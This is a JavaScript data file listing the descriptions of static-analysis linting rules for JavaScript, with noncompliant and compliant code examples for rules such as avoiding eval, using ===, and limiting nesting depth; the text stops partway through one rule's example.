window.data = {"total":92,"p":1,"ps":500,"rules":[{"key":"common-js:InsufficientBranchCoverage","repo":"common-js","name":"Branches should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the branch coverage on this file is less than the required threshold.It gives the number of branches to be covered in order to reach the required threshold.","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"minimumBranchCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"javascript:ArrayAndObjectConstructors","repo":"javascript","name":"Array constructors should not be used","htmlDesc":"<p>Array literals should always be preferred to Array constructors.<\/p>\n<p>Array constructors are error-prone due to the way their arguments are interpreted. If more than one argument is used, the array length will be\nequal to the number of arguments. However, using a single argument will have one of three consequences:<\/p>\n<ul>\n <li> If the argument is a number and it is a natural number the length will be equal to the value of the argument. <\/li>\n <li> If the argument is a number, but not a natural number an exception will be thrown. <\/li>\n <li> Otherwise the array will have one element with the argument as its value. <\/li>\n<\/ul>\n<p>For these reasons, if someone changes the code to pass 1 argument instead of 2 arguments, the array might not have the expected length. To avoid\nthese kinds of weird cases, always use the more readable array.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a1 = new Array(x1, x2, x3); \/\/ Noncompliant. Results in 3-element array.\nvar a2 = new Array(x1); \/\/ Noncompliant and variable in results\nvar a3 = new Array(); \/\/ Noncompliant. Results in 0-element array.\n\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar a1 = [x1, x2, x3];\nvar a2 = [x1];\nvar a3 = [];\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:AssignmentWithinCondition","repo":"javascript","name":"Assignments should not be made from within sub-expressions","htmlDesc":"<p>Assignments within sub-expressions are hard to spot and therefore make the code less readable. Ideally, sub-expressions should not have\nside-effects.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ((str = cont.substring(pos1, pos2)) != '') { \/\/ Noncompliant\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstr = cont.substring(pos1, pos2);\nif (str != '') {\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Assignments in <code>while<\/code> statement conditions, and assignments enclosed in relational expressions are allowed.<\/p>\n<pre>\nwhile ((line = nextLine()) != null) {...} \/\/ Compliant\n\nwhile (line = nextLine()) {...} \/\/ Compliant\n\nif (line = nextLine()) {...} \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.1 - Assignment operators shall not be used in expressions that yield a Boolean value <\/li>\n <li> MISRA C++:2008, 6-2-1 - Assignment operators shall not be used in sub-expressions <\/li>\n <li> MISRA C:2012, 13.4 - The result of an assignment operator should not be used <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/481.html\">MITRE, CWE-481<\/a> - Assigning instead of Comparing <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/nYFtAg\">CERT, EXP45-C.<\/a> - Do not perform assignments in selection statements <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1gCTAw\">CERT, EXP51-J.<\/a> - Do not perform assignments in conditional expressions\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KQvhAg\">CERT, EXP19-CPP.<\/a> - Do not perform assignments in conditional expressions\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KYIyAQ\">CERT, MSC02-CPP.<\/a> - Avoid errors of omission <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:BitwiseOperators","repo":"javascript","name":"Bitwise operators should not be used in boolean contexts","htmlDesc":"<p>The bitwise operators <code>&<\/code>, <code>|<\/code> can be mistaken for the boolean operators <code>&&<\/code> and <code>||<\/code>.\n<\/p>\n<p>This rule raises an issue when <code>&<\/code> or <code>|<\/code> is used in a boolean context.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (a & b) { ... } \/\/ Noncompliant; & used in error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a && b) { ... }\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a file contains other bitwise operations, (<code>^<\/code>, <code><<<\/code>, <code>>>><\/code>, <code>>><\/code>,\n<code>~<\/code>, <code>&=<\/code>, <code>^=<\/code>, <code>|=<\/code>, <code><<=<\/code>, <code>>>=<\/code>, <code>>>>=<\/code> and\n<code>&<\/code> or <code>|<\/code> used with a numeric literal as the right operand) all issues in the file are ignored, because it is evidence that\nbitwise operations are truly intended in the file.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:BoundOrAssignedEvalOrArguments","repo":"javascript","name":"\"eval\" and \"arguments\" should not be bound or assigned","htmlDesc":"<p><code>eval<\/code> is used to evaluate a string as JavaScript code, and <code>arguments<\/code> is used to access function arguments through indexed\nproperties. As a consequence, <code>eval<\/code> and <code>arguments<\/code> should not be bound or assigned, because doing so would overwrite the\noriginal definitions of those two reserved words. <\/p>\n<p>What's more, using either of those two names to assign or bind will generate an error in JavaScript strict mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval = 17; \/\/ Noncompliant\narguments++; \/\/ Noncompliant\n++eval; \/\/ Noncompliant\nvar obj = { set p(arguments) { } }; \/\/ Noncompliant\nvar eval; \/\/ Noncompliant\ntry { } catch (arguments) { } \/\/ Noncompliant\nfunction x(eval) { } \/\/ Noncompliant\nfunction arguments() { } \/\/ Noncompliant\nvar y = function eval() { }; \/\/ Noncompliant\nvar f = new Function(\"arguments\", \"return 17;\"); \/\/ Noncompliant\n\nfunction fun() {\n if (arguments.length == 0) { \/\/ Compliant\n \/\/ do something\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nresult = 17;\nargs++;\n++result;\nvar obj = { set p(arg) { } };\nvar result;\ntry { } catch (args) { }\nfunction x(arg) { }\nfunction args() { }\nvar y = function fun() { };\nvar f = new Function(\"args\", \"return 17;\");\n\nfunction fun() {\n if (arguments.length == 0) {\n \/\/ do something\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:CollapsibleIfStatements","repo":"javascript","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x != undefined) {\n if (x === 2) {\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x != undefined && x === 2) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ContinueStatement","repo":"javascript","name":"\"continue\" should not be used","htmlDesc":"<p><code>continue<\/code> is an unstructured control flow statement. It makes code less testable, less readable and less maintainable. Structured\ncontrol flow statements such as <code>if<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n for (i = 0; i < 10; i++) {\n if (i == 5) {\n continue; \/* Noncompliant *\/\n }\n alert(\"i = \" + i);\n }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n for (i = 0; i < 10; i++) {\n if (i != 5) { \/* Compliant *\/\n alert(\"i = \" + i);\n }\n }\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.5 - The continue statement shall not be used. <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ElseIfWithoutElse","repo":"javascript","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x == 0) {\n doSomething();\n} else if (x == 1) {\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x == 0) {\n doSomething();\n} else if (x == 1) {\n doSomethingElse();\n} else {\n throw \"Unexpected value for x\";\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:EqEqEq","repo":"javascript","name":"\"===\" and \"!==\" should be used instead of \"==\" and \"!=\"","htmlDesc":"<p>The <code>==<\/code> and <code>!=<\/code> operators do type coercion before comparing values. This is bad because it can mask type errors. For\nexample, it evaluates <code>' \\t\\r\\n' == 0<\/code> as <code>true<\/code>.<\/p>\n<p>It is best to always use the side-effect-less <code>===<\/code> and <code>!==<\/code> operators instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (var == 'howdy') {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (var === 'howdy') {...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Even if testing the equality of a variable against null doesn't do exactly what most JavaScript developers believe, usage of <code>==<\/code> or\n<code>!=<\/code> is tolerated in such context. In the following case, if <code>foo<\/code> hasn't been initialized, its default value is not\n<code>null<\/code> but <code>undefined<\/code>. Nevertheless <code>undefined == null<\/code>, so JavaScript developers get the expected behavior.<\/p>\n<pre>\nif(foo == null) {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:Eval","repo":"javascript","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. Dynamically evaluating code is slow and a potential security issue when\nthe arguments haven't been properly validated.<\/p>\n<p>In general it is better to avoid it altogether, particularly when there are safer alternatives.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar value = eval('obj.' + propName); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar value = obj[propName];\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule will not raise an issue when the argument of the <code>eval<\/code> call is a literal string as it is reasonably safe.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n Evaluated Code ('Eval Injection') <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:ExcessiveParameterList","repo":"javascript","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething(param1, param2, param3, param4, param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(param1, param2, param3, param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumFunctionParameters","htmlDesc":"The maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ForIn","repo":"javascript","name":"\"for...in\" loops should filter properties before acting on them","htmlDesc":"<p>The <code>for...in<\/code> statement allows you to loop through the names of all of the properties of an object. The list of properties includes all\nthose properties that were inherited through the prototype chain. This has the side effect of serving up functions when the interest is in data\nproperties. Programs that don't take this into account can fail.<\/p>\n<p>Therefore, the body of every <code>for...in<\/code> statement should be wrapped in an <code>if<\/code> statement that filters which properties are\nacted upon. It can select for a particular type or range of values, or it can exclude functions, or it can exclude properties from the prototype. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (name in object) {\n doSomething(name); \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (name in object) {\n if (object.hasOwnProperty(name)) {\n doSomething(name);\n }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Loops used to clone objects are ignored.<\/p>\n<pre>\nfor (prop in obj) {\n a[prop] = obj[prop]; \/\/ Compliant by exception\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FunctionComplexity","repo":"javascript","name":"Functions should not be too complex","htmlDesc":"<p>The Cyclomatic Complexity of functions should not exceed a defined threshold. Complex code may perform poorly and can be difficult to test\nthoroughly.<\/p>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"maximumFunctionComplexityThreshold","htmlDesc":"The maximum authorized complexity in function","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:FunctionDeclarationsWithinBlocks","repo":"javascript","name":"Function declarations should not be made within blocks","htmlDesc":"<p>While most script engines support function declarations within blocks, it is not part of ECMAScript 5 and below, and from browser to browser the\nimplementations are inconsistent with each other. ECMAScript 5 and below only allow function declarations in the root statement list of a script or\nfunction. If you are targeting browsers that don't support ECMAScript 6, use a variable initialized with a function expression to define a function\nwithin a block :<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x) {\n function foo() {}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x) {\n var foo = function() {}\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FutureReservedWords","repo":"javascript","name":"\"future reserved words\" should not be used as identifiers","htmlDesc":"<p>The following words may be used as keywords in future evolutions of the language, so using them as identifiers should be avoided to allow an easier\nadoption of those potential future versions:<\/p>\n<ul>\n <li> <code>await<\/code> <\/li>\n <li> <code>class<\/code> <\/li>\n <li> <code>const<\/code> <\/li>\n <li> <code>enum<\/code> <\/li>\n <li> <code>export<\/code> <\/li>\n <li> <code>extends<\/code> <\/li>\n <li> <code>implements<\/code> <\/li>\n <li> <code>import<\/code> <\/li>\n <li> <code>interface<\/code> <\/li>\n <li> <code>let<\/code> <\/li>\n <li> <code>package<\/code> <\/li>\n <li> <code>private<\/code> <\/li>\n <li> <code>protected<\/code> <\/li>\n <li> <code>public<\/code> <\/li>\n <li> <code>static<\/code> <\/li>\n <li> <code>super<\/code> <\/li>\n <li> <code>yield<\/code> <\/li>\n<\/ul>\n<p>Use of these words as identifiers would produce an error in JavaScript <code>strict<\/code> mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar package = document.getElementsByName(\"foo\"); \/\/ Noncompliant\nvar someData = { package: true }; \/\/ Compliant, as it is not used as an identifier here\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar elements = document.getElementsByName(\"foo\"); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:LabelPlacement","repo":"javascript","name":"Only \"while\", \"do\" and \"for\" statements should be labelled","htmlDesc":"<p>Any statement or block of statements can be identified by a label, but those labels should be used only on <code>while<\/code>,\n<code>do-while<\/code> and <code>for<\/code> statements. Using labels in any other context leads to unstructured, confusing code. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyLabel:if (i % 2 == 0) { \/\/ Noncompliant\n if (i == 12) {\n print(\"12\");\n break myLabel;\n }\n print(\"Odd number, but not 12\");\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyLabel:for (i = 0; i < 10; i++) { \/\/ Compliant\n print(\"Loop\");\n break myLabel;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:NestedIfDepth","repo":"javascript","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if (condition1) { \/\/ Compliant - depth = 1\n \/* ... *\/\n if (condition2) { \/\/ Compliant - depth = 2\n \/* ... *\/\n for(int i = 0; i < 10; i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n \/* ... *\/\n if (condition4) { \/\/ Non-Compliant - depth = 4\n if (condition5) { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n \/* ... *\/\n }\n return;\n }\n }\n }\n }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumNestingLevel","htmlDesc":"Maximum allowed "if\/for\/while\/switch\/try" statements nesting depth","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ParsingError","repo":"javascript","name":"JavaScript parser failure","htmlDesc":"<p>When the JavaScript parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the\nnumber of files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:PrimitiveWrappers","repo":"javascript","name":"Wrapper objects should not be used for primitive types","htmlDesc":"<p>The use of wrapper objects for primitive types is gratuitous, confusing and dangerous. If you use a wrapper object constructor for type conversion,\njust remove the <code>new<\/code> keyword, and you'll get a primitive value automatically. If you use a wrapper object as a way to add properties to a\nprimitive, you should re-think the design. Such uses are considered bad practice, and should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet x = new Number(\"0\");\nif (x) {\n alert('hi'); \/\/ Shows 'hi'.\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet x = Number(\"0\");\nif (x) {\n alert('hi');\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Cases when argument of primitive type constructor is a literal of the same type are ignored, except <code>new Boolean(false)<\/code>.<\/p>\n<pre>\nlet booleanObject = new Boolean(true);\nlet numberObject = new Number(0);\nlet stringObject = new String('');\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1067","repo":"javascript","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1105","repo":"javascript","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition)\n{ \/\/Noncompliant\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) { \/\/Compliant\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Object literals appearing as arguments can start on their own line.<\/p>\n<pre>\nfunctionWithObject(\n { \/\/Compliant\n g: \"someValue\"\n }\n);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1125","repo":"javascript","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (booleanVariable == true) { \/* ... *\/ }\nif (booleanVariable != true) { \/* ... *\/ }\nif (booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (booleanVariable) { \/* ... *\/ }\nif (!booleanVariable) { \/* ... *\/ }\nif (booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>\n\n<h2>Deprecated<\/h2>\n<p>This rule is deprecated, and will eventually be removed.<\/p>","status":"DEPRECATED","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1134","repo":"javascript","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(numerator, denominator) {\n return numerator \/ denominator; \/\/ FIXME denominator value might be 0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1135","repo":"javascript","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1219","repo":"javascript","name":"\"switch\" statements should not contain non-case labels","htmlDesc":"<p>Even if it is legal, mixing case and non-case labels in the body of a switch statement is very confusing and can even be the result of a typing\nerror.<\/p>\n<h2>Noncompliant Code Examples<\/h2>\n<p>Case 1, the code is syntactically correct but the behavior is not the expected one<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n case TUESDAY:\n WEDNESDAY: \/\/ instead of \"case WEDNESDAY\"\n doSomething();\n break;\n ...\n}\n<\/pre>\n<p>Case 2, the code is correct and behaves as expected but is hardly readable <\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n break;\n case TUESDAY:\n foo:for(i = 0 ; i < X ; i++) {\n \/* ... *\/\n break foo; \/\/ this break statement doesn't relate to the nesting case TUESDAY\n \/* ... *\/\n }\n break;\n \/* ... *\/\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>Case 1<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n case TUESDAY:\n case WEDNESDAY:\n doSomething();\n break;\n ...\n}\n<\/pre>\n<p>Case 2<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n break;\n case TUESDAY:\n compute(args); \/\/ put the content of the labelled \"for\" statement in a dedicated method\n break;\n\n \/* ... *\/\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1264","repo":"javascript","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, and the initialization and increment expressions are missing, a\n<code>while<\/code> loop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1301","repo":"javascript","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (variable) {\n case 0:\n doSomething();\n break;\n default:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (variable == 0) {\n doSomething();\n} else {\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S138","repo":"javascript","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>\n<h2>Exceptions<\/h2>\n<p>This function ignores Immediately Invoked Function Expressions (IIFE), which are functions that are created and invoked without ever being assigned\na name.<\/p>\n<pre>\n(function () { \/\/ Ignored by this rule\n\n function open() { \/\/ Classic function declaration; not ignored\n \/\/ ...\n }\n\n function read() {\n \/\/ ...\n }\n\n function readlines() {\n \/\/ ...\n }\n})();\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"200","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1442","repo":"javascript","name":"\"alert(...)\" should not be used","htmlDesc":"<p><code>alert(...)<\/code> can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive\ninformation to attackers, and should never be displayed. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(unexpectedCondition)\n{\n alert(\"Unexpected Condition\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S1656","repo":"javascript","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction setName(name) {\n name = name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction setName(name) {\n this.name = name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S1871","repo":"javascript","name":"Two branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in a <code>switch<\/code> statement or two branches in an <code>if<\/code> chain with the same implementation is at\nbest duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an <code>if<\/code> chain they should\nbe combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i) {\n case 1:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n doFirstThing();\n doSomething();\n break;\n default:\n doTheRest();\n}\n\nif (a >= 0 && a < 10) {\n doFirstThing();\n 